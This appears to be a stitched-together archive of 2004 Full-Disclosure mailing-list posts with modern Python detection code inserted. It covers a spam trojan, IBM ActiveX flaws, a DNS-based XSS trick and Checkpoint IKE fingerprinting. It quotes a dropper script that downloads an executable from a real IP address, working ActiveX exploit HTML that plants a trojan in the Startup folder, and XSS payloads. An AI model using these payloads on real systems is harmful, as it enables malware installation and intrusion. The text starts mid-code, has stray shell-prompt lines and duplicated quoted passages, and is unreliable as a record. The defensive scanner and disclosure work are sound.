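    for host, name in parse_ike_scan_output(SAMPLE_IKE_SCAN_OUTPUT):
        print(host, name)
```

Because the version field is read as a full 32-bit big-endian integer rather than only the four hex characters the post names, the decoder also handles a future release whose value spills into the upper bytes; anything not in the table is reported as unknown rather than guessed.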
Re: [Full-Disclosure] spamming trojan?
From: joe smith (joe@joesmith.homeip.net)
Date: Wed Jun 16 2004 - 13:25:19 CDT
I used PE Explorer.
Looks like june4.exe is some kind of spyware. It references another
site "cjdra.com", possibly uploading user information there.
I just started learning assembly, please pardon my lack of knowledge on
reverse engineering.
J
Michael Gargiullo wrote:
>On Wed, 2004-06-16 at 13:41, joe smith wrote:
>
>>The file is UPX packed and within the file there is another "GET"
>>pointing to "http://219.234.95.124/june4.exe"
>>
>>J
>
>Like those Chinese stacking dolls... How'd you unpack it?
>
>>Michael Gargiullo wrote:
>>
>>>On Wed, 2004-06-16 at 08:23, Geo. wrote:
>>>
>>>>Received a spam this morning claiming I have a voicemail with the link
>>>>(warning do not click the link)
>>>>
>>>>http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
>>>>
>>>>which brings up a frames based page with one of the frames containing this
>>>>
>>>> function InjectedDuringRedirection(){
>>>> showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
>>>>
>>>>Anyone want to try and analyze what this thing is? It was spammed to about
>>>>30 addresses here this morning.
>>>>
>>>>Geo.
>>>>
>>>Here's the contents:
>>>
>>>var x = new ActiveXObject("Microsoft.XMLHTTP");
>>>x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0);
>>>x.Send();
>>>
>>>var s = new ActiveXObject("ADODB.Stream");
>>>s.Mode = 3;
>>>s.Type = 1;
>>>s.Open();
>>>s.Write(x.responseBody);
>>>
>>>s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
>>>location.href = "mms://";
>>>
>>>so whatever w_e_d.exe is...
[Full-Disclosure] RE: [ GLSA 200406-10 ] Gallery: Privilege escalation vulnerability
From: Bob Walton (bob@itsecsystems.com)
Date: Wed Jun 16 2004 - 10:57:55 CDT
You all might want to take a look at America's best kept secret, security for
wireless internet (we have been doing it for 5 years), and would truly value your
opinion. Bob Walton 877-326-5990 bob@itsecsystems.com
-----Original Message-----
From: Thierry Carrez [mailto:koon@gentoo.org]
Sent: Tuesday, June 15, 2004 3:14 PM
To: gentoo-announce@lists.gentoo.org
Cc: bugtraq@securityfocus.com; full-disclosure@lists.netsys.com;
security-alerts@linuxsecurity.com
Subject: [ GLSA 200406-10 ] Gallery: Privilege escalation vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Gallery: Privilege escalation vulnerability
Date: June 15, 2004
Bugs: #52798
ID: 200406-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
There is a vulnerability in the Gallery photo album software which may
allow an attacker to gain administrator privileges within Gallery.
Background
==========
Gallery is a web application written in PHP which is used to organize
and publish photo albums. It allows multiple users to build and
maintain their own albums. It also supports the mirroring of images on
other servers.
Affected packages
=================
-------------------------------------------------------------------
     Package                 /  Vulnerable  /         Unaffected
-------------------------------------------------------------------
  1  app-misc/gallery           <= 1.4.3_p1            >= 1.4.3_p2
Description
===========
There is a vulnerability in the Gallery photo album software which may
allow an attacker to gain administrator privileges within Gallery. A
Gallery administrator has full access to all albums and photos on the
server, thus attackers may add or delete photos at will.
Impact
======
Attackers may gain full access to all Gallery albums. There is no risk
to the webserver itself, or the server on which it runs.
Workaround
==========
There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version.
Resolution
==========
All users should upgrade to the latest available version of Gallery.
# emerge sync
# emerge -pv ">=app-misc/gallery-1.4.3_p2"
# emerge ">=app-misc/gallery-1.4.3_p2"
References
==========
[ 1 ] Gallery Announcement
http://gallery.menalto.com/modules.php?op=modload&name=News&file=article&sid=123&mode=thread&order=0&thold=0
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200406-10.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/1.0
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFAz0qMvcL1obalX08RAmuoAKCKcyWXNtt+mdgtX26R9l96V8yE4QCfVFQG
9s9GiyiY83X/VHcx2Kc+mQQ=
=+z9+
-----END PGP SIGNATURE-----
- application/msword attachment: email_intro_letter.doc
[Full-Disclosure] RE: MAGIC XSS INTO THE DNS: coelacanth
From: Drew Copley (dcopley@eEye.com)
Date: Wed Jun 16 2004 - 13:29:52 CDT
> -----Original Message-----
> From: Windows NTBugtraq Mailing List
> [mailto:NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM] On Behalf Of
> http-equiv@excite.com
> Sent: Tuesday, June 15, 2004 3:00 PM
> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: MAGIC XSS INTO THE DNS: coelacanth
>
> Tuesday, June 15, 2004
>
> The following courtesy of 'bitlance winter' adds an entirely new
> dimension to the matter and also suggests some additional
> peculiarities at play:
>
> <a href='http://"><plaintext>.e-gold.com'>foo</a>
>
> <a href='http://"><script>alert()<%2Fscript>.e-gold.com'>foo</a>
>
> these will inject arbitrary html and script into the site in the
> context of the 'intranet zone', which means one no longer needs
> to go out and setup a site with the dns issue, all one needs to
> do is locate a functioning site, include their code into a
> suitable url, either direct the target via that or place an
> iframe elsewhere pointing to it.
Because the wildcarding is a bit too wild.
For instance, "http://&money.e-gold.com/ " resolves.
And, "http://&money;G-Money&OGbabyOG.e-gold.com/" resolves.
In e-gold's case, they actually take the url line and render
it variously in their dynamic html on their page.
>
> Still unclear how or why this can be interpreted into the site
> or through the browser.
>
> credit: 'bitlance winter'
>
> End Call
>
> --
> http://www.malware.com
>
> -----
> NTBugtraq Editor's Note:
>
> Want to reply to the person who sent this message? This list
> is configured such that just hitting reply is going to result
> in the message coming to the list, not to the individual who
> sent the message. This was done to help reduce the number of
> Out of Office messages posters received. So if you want to
> send a reply just to the poster, you'll have to copy their
> email address out of the message and place it in your TO: field.
> -----
Re: [Full-Disclosure] Akamai
From: Ron DuFresne (dufresne@winternet.com)
Date: Wed Jun 16 2004 - 14:13:09 CDT
Might as well toss in egress filtering to prevent many of the abuses of
spoofing that happen in the present env of the internet. The ISP and
others will claim that this is far too costly for their routers to handle,
but, for the vast majority of sites, this is likely to not be as costly as
the network folks are claiming as a way to avoid doing a tad bit more work
in their router configs. Some of the worst sites for spoofing abuses, and
those that have networkies that will complain the loudest, are the .edu's.
Thanks,
Ron DuFresne
[SNIP]
> If networks simply took responsibility for the traffic that comes from
> them, this problem wouldn't exist. It's completely trivial to find
> infected hosts on a network through passive monitoring. They should then
> be disconnected until they are properly cleaned and secured.
>
> Unless networks begin doing this routinely (including ISPs), legislation
> will be introduced to "solve" the problem, and then we will all be much
> worse off. There's nothing like a law to completely screw things up.
>
> Paul Schmehl (pauls@utdallas.edu)
> Adjunct Information Security Officer
> The University of Texas at Dallas
> AVIEN Founding Member
> http://www.utdallas.edu/ir/security/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
Re: [Full-Disclosure] Akamai
From: Peter van den Heuvel (peter@bank-connect.com)
Date: Wed Jun 16 2004 - 14:26:45 CDT
Paul Schmehl wrote:
> If networks simply took responsibility for the traffic that comes from
> them, this problem wouldn't exist.
Indeed. DNS's, AS's and what not else is required to make the internet
tick; all is centrally controlled and delegated. What's missing is a
flanking reverse of responsibilities. It's idiotic that providers or even
full countries can completely ignore / reject any complaint without
having their AS or DNS taken down.
> Unless networks begin doing this routinely (including ISPs), legislation
> will be introduced to "solve" the problem, and then we will all be much
> worse off. There's nothing like a law to completely screw things up.
Amen!
Peter
[Full-Disclosure] "IBM Access Support" (eGatherer) Activex Dangerous Methods Vulnerability
From: Drew Copley (dcopley@eEye.com)
Date: Wed Jun 16 2004 - 13:47:55 CDT
"IBM Access Support" (eGatherer) Activex Dangerous Methods Vulnerability
Release Date:
June 15, 2004
Date Reported:
February 20, 2004
Patch Development Time (In Days):
116
Severity:
High (Remote Code Execution)
Vendor:
IBM
Systems Affected:
IBM Access Support (eGatherer) Activex Version 2.0.0.16
Overview:
eEye Digital Security has discovered a security vulnerability in IBM's
signed "eGatherer" activex. Because this application is signed, it might
be presented to users on the web for execution in the name of IBM. If
users trust IBM, they will run this, and their systems will be
compromised. This activex was designed by IBM to be used for an
automated support solution for their PC's. This is installed by default
on many popular IBM PC models.
The issue is quite simple. Activex is a very profound web technology. As
a profound web technology it may be abused. Designers might create an
activex which could perform any function on a user's computer.
Microsoft relies on trust for the security model and warns against
making activex with dangerous capabilities. The responsibility, however,
rests with the creator of the activex, as in any trust model.
In this case, IBM made available methods named such as "GetMake",
"GetModel", "GetOSName", "SetDebugging" (accepting variable called
"filename") and "RunEgatherer" (also accepting suspicious parameter).
These dangerous methods were found to be able to write a trojan file to
the user's startup folder through a difficult trick.
It should be further noted that both "SetDebugging" and "RunEgether"
methods allow a web page author to write files of their choice (though
the content is limited) to the victim's hard drive -- anywhere to their
hard drive. These are the default and clearly stated usage of these
methods.
Technical Details:
For clarification purposes this will be presented as a two page attack,
though it may easily be a single HTML page attack.
-----------EXAMPLE HTML 1 ---------
//first this page would be viewed, then through refreshing or whatever
one goes to the second page (or just timing the two calls with
setTimeout and putting them on the same page...)
<object classid="clsid:74FFE28D-2378-11D5-990C-006094235084" id="X">
</object>
<script>
X.SetDebugging("/../xx.hta",-1);
</script>
---------------------------------
-----------EXAMPLE HTML 2 ---------
<object classid="clsid:74FFE28D-2378-11D5-990C-006094235084" id="X">
</object>
<script>
X.SetDebugging("/../x<iframe src=http://www.malware.com>x.hta",-1);
</script>
---------------------------------
In the above example, we see the object called utilizing the "object"
tag. The codebase tag [not shown here] is used by the browser to
initiate the install of the activex if it is not already existing on the
system. This would bring up the activex prompt which essentially asks
the user if they trust IBM. Finally, the object is named "X", so we
might reference it later in script and use its dangerous methods.
In the first page we call the "SetDebugging" method. "SetDebugging"
writes a file called "xx.hta" to the C:\ drive. (An attacker would
probably write the file to the StartUP folder in real life.) This file
will have "xx.hta" written inside of it, along with some other stuff.
We need to control what is written inside the file so we can write
dangerous scripting. But, all we can write is what can be in a filename.
Now, the second HTML page is called. What happens? The application
throws an error, but before it crashes, it writes our exploit code to
the file "xx.hta". (It crashes because "<>" are not valid characters for
a filename).
So, now we have the exploit file in the exploit location with the
exploit location within it... and the target system is taken down.
Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.
Vendor Status:
IBM has released a patch for this vulnerability. The patch is available
at the following location:
http://www-306.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-51860
Credit:
Discovery: Drew Copley
Additional Research: http-equiv@malware.com
Related Links:
Retina Network Security Scanner - Free 15 Day Trial
http://www.eeye.com/html/products/retina/download/index.html
Another Quote of the Day:
"A man's greatest work is to break his enemies, to drive them before
him, to take from them all the things that have been theirs, to hear the
weeping of those who cherished them." - Genghis Khan
Copyright (c) 1998-2004 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.
[Full-Disclosure] IBM acpRunner Activex Dangerous Methods Vulnerability
From: Drew Copley (dcopley@eEye.com)
Date: Wed Jun 16 2004 - 13:45:57 CDT
IBM acpRunner Activex Dangerous Methods Vulnerability
Release Date:
June 15, 2004
Date Reported:
February 20, 2004
Patch Development Time (In Days):
116
Severity:
High (Remote Code Execution)
Vendor:
IBM
Systems Affected:
acpRunner Activex Version 1.2.5.0
Overview:
eEye Digital Security has discovered a security vulnerability in IBM's
signed "acpRunner" activex. Because this application is signed, it might
be presented to users on the web for execution in the name of IBM. If
users trust IBM, they will run this, and their systems will be
compromised. This activex was designed by IBM to be used for an
automated support solution for their PC's. An unknown number of systems
already have this activex on their systems.
The issue is quite simple. Activex is a very profound web technology. As
a profound web technology it may be abused. Designers might create an
activex which could perform any function on a user's computer.
Microsoft relies on trust for the security model and warns against
making activex with dangerous capabilities. The responsibility, however,
rests with the creator of the activex, as in any trust model.
In this case, IBM made available methods named such as "DownLoadURL",
"SaveFilePath", and "Download". Almost needless to say, these methods
allow a remote attacker to have a victim system silently download the
file of their choosing into the location of their choosing. By
downloading an executable file to the Startup folder, this malicious
executable would be automatically executed on start up.
Technical Details:
-----------EXAMPLE HTML---------
<object width="310" height="20"
codebase="https://www-3.ibm.com/pc/support/access/aslibmain/content/AcpControl.cab" id="runner"
classid="CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3"
data="DATA:application/x-oleobject;BASE64,YayY5W9MTU+Hf/rEnKkfowADAAAKIAAAEQIAAA==">
</object>
<script>
runner.DownLoadURL = "http://malicioussystem/trojan.exe";
runner.SaveFilePath = "\..\\Start Menu\\Programs\\Startup";
runner.FileSize = 96,857;
runner.FileDate = "01/09/2004 3:33";
runner.DownLoad();
</script>
---------------------------------
In the above example, we see the object called utilizing the "object"
tag. The codebase tag is used by the browser to initiate the install of
the activex if it is not already existing on the system. This would
bring up the activex prompt which essentially asks the user if they
trust IBM. Finally, the object is named "runner", so we might reference
it later in script and use its dangerous methods.
In the script we see we access the dangerous methods of "runner" in a
completely straightforward manner. The "saveFilePath" method uses a
local url on the user's system which will accurately point to the user's
startup folder. Finally, the method "Download" is called, and a progress
meter shows the trojan file being downloaded to the exploit folder on
the user's system. At restart, the OS would automatically run the
trojan.
Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.
Vendor Status:
IBM has released a patch for this vulnerability. The patch is available
at the following location:
http://www-306.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-51860
Credit:
Discovery: http-equiv@malware.com
Additional Research: Drew Copley
Related Links:
Retina Network Security Scanner - Free 15 Day Trial
http://www.eeye.com/html/products/retina/download/index.html
Quotes of the Day:
"Fuggedboutit" - the "Cosa Nostra" community as reported by "Donnie
Brasco" (aka, Joe Pistone, FBI)
"You know what glamour is? It is fear." - The Krays (1981)
Copyright (c) 1998-2004 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.
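Both eEye advisories and the "spamming trojan?" thread above describe the same defender-side problem: a signed or scriptable ActiveX control is driven from ordinary HTML into writing an attacker-chosen file to disk. A mail gateway or web proxy can flag those pages before they reach a browser. The following is an added example, not code from eEye, IBM or any poster in this thread; the CLSIDs, method names and script idioms are those quoted in the messages above, the sample pages are constructed here (hostnames replaced with example.invalid), and the rule names and functions are the author's own.

```python
import re

# CLSIDs and method names quoted in the two eEye advisories above.
KNOWN_DANGEROUS_CLSIDS = {
    "74ffe28d-2378-11d5-990c-006094235084": "IBM Access Support (eGatherer) ActiveX",
    "e598ac61-4c6f-4f4d-877f-fac49ca91fa3": "IBM acpRunner ActiveX",
}
DANGEROUS_METHODS = ("SetDebugging", "RunEgatherer", "DownLoadURL", "SaveFilePath", "DownLoad")

CLSID_RE = re.compile(
    r"classid\s*=\s*[\"']?\s*clsid:([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})", re.I)
METHOD_RE = re.compile(r"\.(" + "|".join(DANGEROUS_METHODS) + r")\b", re.I)
# Script idioms from the dropper posted in the "spamming trojan?" thread.
ACTIVEX_RE = re.compile(r"ActiveXObject\s*\(\s*[\"']([^\"']+)[\"']\s*\)", re.I)
SAVETOFILE_RE = re.compile(r"\.SaveToFile\s*\(", re.I)
OFFSCREEN_DIALOG_RE = re.compile(
    r"showModalDialog\s*\([^)]*dialog(?:Top|Left)\s*:\s*-\d{3,}", re.I)


def scan_html(text):
    """Return a list of (rule, detail) findings for one HTML/script document."""
    findings = []
    # 1. <object classid="clsid:..."> instantiating a control with known dangerous methods
    for m in CLSID_RE.finditer(text):
        name = KNOWN_DANGEROUS_CLSIDS.get(m.group(1).lower())
        if name:
            findings.append(("known-dangerous-activex", name))
    # 2. Script calling one of the file-writing methods named in the advisories
    for m in METHOD_RE.finditer(text):
        findings.append(("dangerous-method-call", m.group(1)))
    # 3. XMLHTTP/ADODB.Stream download-and-save chain ending in SaveToFile
    progids = {m.group(1).lower() for m in ACTIVEX_RE.finditer(text)}
    if "adodb.stream" in progids and SAVETOFILE_RE.search(text):
        findings.append(("download-and-save-chain", "ADODB.Stream + SaveToFile"))
    # 4. Modal dialog positioned thousands of pixels off screen to hide it
    if OFFSCREEN_DIALOG_RE.search(text):
        findings.append(("offscreen-modal-dialog", "showModalDialog positioned off screen"))
    return findings


# Constructed samples, modelled on the snippets quoted in the messages above.
SAMPLE_ACPRUNNER_PAGE = r"""<object id="runner" classid="CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3"></object>
<script>
runner.DownLoadURL = "http://example.invalid/trojan.exe";
runner.SaveFilePath = "\..\\Start Menu\\Programs\\Startup";
runner.DownLoad();
</script>
"""

SAMPLE_EGATHERER_PAGE = r"""<object classid="clsid:74FFE28D-2378-11D5-990C-006094235084" id="X"></object>
<script>X.SetDebugging("/../xx.hta",-1);</script>
"""

SAMPLE_DROPPER_SCRIPT = r"""
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'x'";
}
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://example.invalid/w_e_d.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
"""

SAMPLE_BENIGN_PAGE = """<html><body><p>Download our brochure.</p>
<script>var d = new Date();</script></body></html>"""

if __name__ == "__main__":
    for label, doc in (("acpRunner", SAMPLE_ACPRUNNER_PAGE), ("eGatherer", SAMPLE_EGATHERER_PAGE),
                       ("dropper", SAMPLE_DROPPER_SCRIPT), ("benign", SAMPLE_BENIGN_PAGE)):
        print(label, scan_html(doc))
```

The patterns are a triage signal rather than a gate: they see only literal markup and script, so a page that assembles the CLSID or method name at run time passes them. On the clients themselves the durable control, alongside IBM's patch, is the ActiveX kill bit (Compatibility Flags = 0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}), which stops Internet Explorer from instantiating the control at all regardless of how the page is written.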
Re: [Full-Disclosure] spamming trojan?
From: Michael Gargiullo (mgargiullo@warpdrive.net)
Date: Wed Jun 16 2004 - 15:43:41 CDT
On Wed, 2004-06-16 at 14:25, joe smith wrote:
> I used PE Explorer.
>
> Looks like june4.exe is some kind of spyware. It references another
> site "cjdra.com", possibly uploading user information there.
>
> I just started learning assembly, please pardon my lack of knowledge on
> reverse engineering.
>
> J
By chance, do you know of a similar tool that runs under linux?
[Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability in all web servers.
From: Hugo Vazquez Carapez (infohacking@hushmail.com)
Date: Wed Jun 16 2004 - 14:59:36 CDT
File Source disclosure vulnerability in all web servers.
Infohacking Security Advisory 04.16.04
www.infohacking.com
Jun 16, 2004
I. BACKGROUND
We discovered a very dangerous file source disclosure vulnerability in
all webservers. This issue can be exploited using Microsoft Internet Explorer
and probably other browsers.
II. DESCRIPTION
Remote exploitation of this issue can be achieved by clicking with the
right button into the website and selecting the "view source code" option.
This option will display the contents of the html code.
For more leet exploitation it is also possible to use lynx --source http://vulnerable.site/file.html
III. ANALYSIS
Successful exploitation allows an attacker to gain very very very sensible
information of the website.
IV. DETECTION
Infohacking has confirmed that all webservers are vulnerable to this
problem. Sites like microsoft, securityfocus, hack.co.za and others are
vulnerable too!
V. WORKAROUNDS
No work.. indeed.
VI. CVE INFORMATION
This is an 0day bug... so still no bid and CVE.
VII. DISCLOSURE TIMELINE
02/18/04 Hugo notified the bug to abuse@255.255.255.255
03/11/04 Initial vendor notification - no response
03/30/04 Secondary vendor notification - no response
05/20/04 We hack iberia.com
06/17/04 Public Disclosure
VIII. CREDIT
Hugo Vázquez Carapez http://www.infohacking.com/dirhugo.gif
Get pwned by script kiddies?
Call us, we can hack you again.
IX. LEGAL NOTICES
Copyright (c) 2004 INFOHACKING, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of INFOHACKING. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email info@infohacking.com for permission.
Disclaimer: Infohacking is pretty whitehat and lame. If you are a part
of the blackhat community, please hack and remove us from the net
Re: [Full-Disclosure] Akamai
From: Valdis.Kletnieks@vt.edu
Date: Wed Jun 16 2004 - 15:57:10 CDT
On Wed, 16 Jun 2004 21:26:45 +0200, Peter van den Heuvel <peter@bank-connect.com> said:
> Indeed. DNS's, AS's and what not else is required to make the internet
> tick; all is centrally controlled and delegated. What's missing is a
> flanking reverse of responsibilities. It's idiotic that providers or even
> full countries can completely ignore / reject any complaint without
> having their AS or DNS taken down.
In other arenas, they call the concept "diplomatic immunity"....
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001
iD8DBQFA0LQmcC3lWbTT17ARArO6AJ9a4KydTf4jYojEHoyHEVA2tdvFZgCg4hZU
PUPjux+XqcwMFldTrgar86M=
=VPbq
-----END PGP SIGNATURE-----
Re: [Full-Disclosure] Checkpoint Firewall-1 IKE Vendor ID information leakage
From: ADT (synfinatic@gmail.com)
Date: Wed Jun 16 2004 - 16:13:55 CDT
So basically, the "issue" is that Checkpoint is following RFC 2408 (ISAKMP)?
Specifically section 3.16:
"The Vendor ID Payload contains a vendor defined constant. The
constant is used by vendors to identify and recognize remote
instances of their implementations. This mechanism allows a vendor
to experiment with new features while maintaining backwards
compatibility. "
While perhaps this is unfortunate, it is clearly documented and I
know that Brett Eldridge gave a talk on this specific issue at DefCon
X.
-Aaron
On Wed, 16 Jun 2004 15:45:29 +0100, Roy Hills <roy.hills@nta-monitor.com> wrote:
>
> Checkpoint Firewall-1 IKE Vendor ID information leakage
>
> Introduction:
>
> Checkpoint Firewall-1 version 4.1 and later with IPsec VPN enabled will
> return an IKE Vendor ID payload when it receives an IKE packet with
> a specific Vendor ID payload. The Vendor ID payload that is returned
> identifies the system as Checkpoint Firewall-1 and also determines the
> Firewall-1 version and service-pack or feature-pack revision number.
> This is an information leakage issue which can be used to fingerprint
> the Firewall-1 system.
>
> This information leakage issue has been verified for Checkpoint Firewall-1
> versions from 4.1 (no service pack) to NG AI R55 inclusive. Firewall-1
> version 4.0 is not vulnerable because it does not return any Vendor ID
> payload, and Firewall-1 versions 3.0b and earlier are not vulnerable
> because they do not support IPsec VPN. However, most people are running
> either NG or 4.1 and therefore this issue will apply to most Firewall-1
> installations that have IPsec VPN enabled.
>
> I used ike-scan v1.6 (http://www.nta-monitor.com/ike-scan/) to discover
> and demonstrate this issue.
>
> Full details are available at:
> http://www.nta-monitor.com/news/checkpoint2004/index.htm
>
> Details:
>
> If an IKE Phase-1 packet with a Vendor ID payload containing the data
> "f4ed19e0c114eb516faaac0ee37daf2807b4381f" (20 bytes of binary data
> encoded as hex) is sent to a Firewall-1 system running Firewall-1 v4.1
> or higher which supports IKE, the Firewall will respond with a Vendor ID
> payload containing data which identifies it as a Checkpoint Firewall-1
> system, provides details about the version of the Firewall software,
> and contains some additional information.
>
> The data that is returned in the Vendor ID payload from the
> Firewall consists of the same 20-byte sequence that was sent
> (f4ed19e0c114eb516faaac0ee37daf2807b4381f) followed by another 20-bytes
> of data that contains the encoded version number and some other details
> that appear to contain details of the Firewall's capabilities.
>
> I presume that the 20-byte "magic string" is an SHA1 hash of something.
> I'd be interested to find out what source string hashes to this value.
>
> Looking at all versions of Firewall-1 from 4.1 base (no service pack) to
> NG AI R55 (latest current version), I have found the following returned
> Vendor ID payloads. In the payloads below, a dot (".") represents an
> arbitrary hex digit:
>
> Firewall-1 4.1 Base (no service pack)
> f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000000020000000000000000....0000
>
> Firewall-1 4.1 SP1
> f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000000030000000000000000....0000
>
> Firewall-1 4.1 SP2-SP6 (SP2, 3, 4, 5, and 6 return the same Vendor ID)
> f4ed19e0c114eb516faaac0ee37daf2807b4381f0000000100000fa20000000000000000....0000
>
> rsh
radon [537]$
> rsh
radon [537]$
> rsh
radon [537]$
> rsh
radon [537]$ cat ,,
> [Note to moderator: I notified Checkpoint of this issue on 13th April
> 2004, but have not received any response apart from a "We've received
> your Email" auto-reply.]
>
> Introduction:
>
> Checkpoint Firewall-1 version 4.1 and later with IPsec VPN enabled will
> return an IKE Vendor ID payload when it receives an IKE packet with
> a specific Vendor ID payload. The Vendor ID payload that is returned
> identifies the system as Checkpoint Firewall-1 and also determines the
> Firewall-1 version and service-pack or feature-pack revision number.
> This is an information leakage issue which can be used to fingerprint
> the Firewall-1 system.
>
> This information leakage issue has been verified for Checkpoint Firewall-1
> versions from 4.1 (no service pack) to NG AI R55 inclusive. Firewall-1
> version 4.0 is not vulnerable because it does not return any Vendor ID
> payload, and Firewall-1 versions 3.0b and earlier are not vulnerable
> because they do not support IPsec VPN. However, most people are running
> either NG or 4.1 and therefore this issue will apply to most Firewall-1
> installations that have IPsec VPN enabled.
>
> I used ike-scan v1.6 (http://www.nta-monitor.com/ike-scan/) to discover
> and demonstrate this issue.
>
> Full details are available at:
> http://www.nta-monitor.com/news/checkpoint2004/index.htm
>
> Details:
>
> If an IKE Phase-1 packet with a Vendor ID payload containing the data
> "f4ed19e0c114eb516faaac0ee37daf2807b4381f" (20 bytes of binary data
> encoded as hex) is sent to a Firewall-1 system running Firewall-1 v4.1
> or higher which supports IKE, the Firewall will respond with a Vendor ID
> payload containing data which identifies it as a Checkpoint Firewall-1
> system, provides details about the version of the Firewall software,
> and contains some additional information.
>
> The data that is returned in the Vendor ID payload from the
> Firewall consists of the same 20-byte sequence that was sent
> (f4ed19e0c114eb516faaac0ee37daf2807b4381f) followed by another 20 bytes
> of data that contains the encoded version number and some other details
> that appear to contain details of the Firewall's capabilities.
>
> I presume that the 20-byte "magic string" is an SHA1 hash of something.
> I'd be interested to find out what source string hashes to this value.
>
> Looking at all versions of Firewall-1 from 4.1 base (no service pack) to
> NG AI R55 (latest current version), I have found the following returned
> Vendor ID payloads. In the payloads below, a dot (".") represents an
> arbitrary hex digit:
>
> Firewall-1 4.1 Base (no service pack)
> f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000000020000000000000000....0000
>
> Firewall-1 4.1 SP1
> f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000000030000000000000000....0000
>
> Firewall-1 4.1 SP2-SP6 (SP2, 3, 4, 5, and 6 return the same Vendor ID)
> f4ed19e0c114eb516faaac0ee37daf2807b4381f0000000100000fa20000000000000000....0000
>
> Firewall-1 NG Base
> f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000013880000000000000000....0000
>
> Firewall-1 NG FP1
> f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000013890000000000000000....0000
>
> Firewall-1 NG FP2
> f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138a0000000000000000....0000
>
> Firewall-1 NG FP3
> f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138b0000000000000000....0000
>
> Firewall-1 NG AI R54
> f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138c0000000000000000....0000
>
> Firewall-1 NG AI R55
> f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138d0000000000000000....0000
>
> The version part is given in character positions 53 - 56 inclusive.
> E.g. "138d" (decimal 5005) for NG AI R55.
>
> Here's an example using ike-scan v1.6 with an NG FP2 Firewall. Here,
> we are specifying RSA authentication with --auth=3 to get the Firewall
> to handshake as well as providing the Firewall-1 Vendor ID:
>
> $ ike-scan --vendor=f4ed19e0c114eb516faaac0ee37daf2807b4381f --auth=3 -M
> 172.16.2.2
> Starting ike-scan 1.6 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
